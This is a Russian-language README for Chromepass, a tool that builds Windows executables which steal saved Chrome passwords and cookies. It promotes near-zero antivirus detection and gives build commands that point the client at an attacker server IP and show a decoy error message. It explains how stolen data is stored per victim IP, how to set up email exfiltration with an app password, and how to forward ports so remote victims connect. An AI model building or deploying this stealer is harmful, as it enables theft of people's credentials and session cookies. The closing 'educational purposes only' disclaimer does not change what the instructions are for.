
Chromepass - Взлом сохраненных паролей Chrome
Посмотреть демо
·
Сообщить об ошибке
·
Предложить функцию
Chromepass — это консольное приложение на Python, которое создаёт исполняемый файл Windows со следующими возможностями:
Новая методология сборки клиента практически гарантирует нулевой уровень обнаружения, даже без тактик обхода антивирусов. Если в будущем это перестанет быть правдой, будут реализованы некоторые методы для улучшения обхода антивирусов.
Пример последних сканирований (примечание: в течение 10-12 часов мы переходим от 0-2 обнаружений к 32, поэтому проводите анализ на своих собственных сборках):
Это очень простое приложение, которое использует только:
Рекомендуется выполнять установку внутри виртуальной машины Windows. Некоторые части процедуры установки могут быть затронуты существующими конфигурациями. Это было протестировано на чистой виртуальной машине Windows 10.
Chromepass требует Windows для компиляции! Поддержка Linux и macOS может быть добавлена в ближайшее время.
git clone https://github.com/darkarp/chromepass
Примечание: В качестве альтернативы клонированию репозитория вы можете загрузить последний релиз, так как репозиторий может быть более подвержен ошибкам.
Зависимости проверяются и устанавливаются автоматически, так что вы можете просто перейти к разделу Использование. Рекомендуется использовать чистую виртуальную машину, чтобы избежать конфликтов.
Если у вас нет зависимостей и интернет не быстрый, это займёт некоторое время. Сходите за кофе.
Chromepass очень прост в использовании. Начните с выполнения:
python create.py -h
Появится список опций, которые интуитивно понятны.
Запуск без параметров создаст сервер и клиент, подключающийся к 127.0.0.1.
Простой пример сборки:
python create.py --ip 92.34.11.220 --error --message 'An Error has happened'
После создания сервера и клиента убедитесь, что сервер запущен, когда запускается клиент.
Cookies и пароли будут сохранены в файлы json в новой папке с именем data в той же директории, что и сервер, разделённые по IP-адресам.
Chromepass поддерживает отправку файлов по электронной почте, хотя это всё ещё экспериментально.
Чтобы включить это, вы можете использовать флаг --email при создании сервера. Вам понадобятся две вещи: имя пользователя (ваш email) и пароль (пароль приложения).
Чтобы сгенерировать пароль приложения, вы должны зайти в настройки аккаунта -> Безопасность и включить двухэтапную аутентификацию (обязательно!)
После включения двухэтапной аутентификации вы увидите новую опцию Пароли приложений:

Нажмите туда, затем выберите соответствующие опции и сгенерируйте пароль:

После нажатия Generate вы получите необходимый пароль.
Вы можете использовать имя пользователя и пароль непосредственно в команде или просто поместить их внутрь config.ini, где написано YOUR_USERNAME и YOUR_PASSWORD.
python create.py --error --message 'An Error has happened' --email --username [email protected] --password qwertyuiopasdfghh
python create.py --error --message 'An Error has happened' --email
Если вы хотите использовать это в удалённом сценарии, вы также должны настроить перенаправление портов (по умолчанию порт 80), чтобы, когда жертва запускает клиент, он мог подключиться к серверу на правильном порту.
Для получения более общей информации нажмите здесь. Если вы всё ещё не удовлетворены, выполните поиск в Google.
Автоматизированная настройка является экспериментальной. По той или иной причине настройка может не установить зависимости правильно. В этом случае вы должны установить их вручную.
К счастью, есть только 2 зависимостей:
Вместо инструментов сборки вы также можете просто установить Visual Studio, но это займёт больше места.
После успешной установки инструментов сборки вы можете просто запустить rustup-init.exe с сайта Rustup.
Это завершает установку необходимых зависимостей, и вы готовы к работе.
Если вы нашли ошибку или баг, пожалуйста, сообщите об этом в виде issue. Если вы хотите предложить функцию или улучшение, сообщите об этом на страницах issue.
Пожалуйста, следуйте шаблонам, показанным при создании issue.
Для доступа к сообществу, полному начинающих экспертов по компьютерной безопасности, от полных новичков до опытных ветеранов, присоединяйтесь к нашему Discord-серверу: WhiteHat Hacking
Если вы хотите связаться со мной, вы можете сделать это по адресу: [email protected]
Я не несу ответственности за то, что вы делаете с предоставленной информацией и кодом. Это предназначено только для профессиональных или образовательных целей.
